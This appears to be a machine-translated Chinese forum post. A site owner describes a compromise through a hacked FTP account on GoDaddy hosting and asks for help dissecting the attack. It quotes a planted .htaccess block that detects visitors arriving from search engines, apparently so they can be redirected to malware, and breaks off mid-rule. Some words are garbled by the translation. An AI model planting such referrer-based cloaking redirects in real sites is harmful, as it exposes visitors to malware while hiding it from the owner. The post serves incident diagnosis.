通过受感染的FTP帐户parsing网站攻击
我的网站被黑了,在这一点上,我知道一些细节,但是我不知道如何发生,以及未来如何预防。 我需要你的帮助,试图解剖攻击,以便我可以防止它再次发生。 这有点长,但我想确保我提供足够的信息来帮助解决问题。 这是发生了什么事。 几个星期前,我从我的托pipe公司GoDaddy收到一封电子邮件,说我的网站使用了太多的资源,他们希望MySQL查询是罪魁祸首。 有问题的查询是一个有5-6个术语的search查询。 我设置的方式越多,search的条件越多,查询就越复杂。 没问题。 我解决了这个问题,但同时,GoDaddy也暂时closures了我的帐户,大概3天之后,一切恢复正常。 事件发生后,我的search引擎stream量急剧下降,大约90%。 它吸了一口气,我没有想到这件事,把它写到查询失败,并认定它会及时返回,因为谷歌recrawled网站。 它没有。 几天前,我收到一封用户的电子邮件,说我的网站托pipe恶意软件。 我直接在浏览器中加载网站,但没有看到任何东西注入页面。 然后我检查我的.htaccess文件,发现以下内容: <IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} […]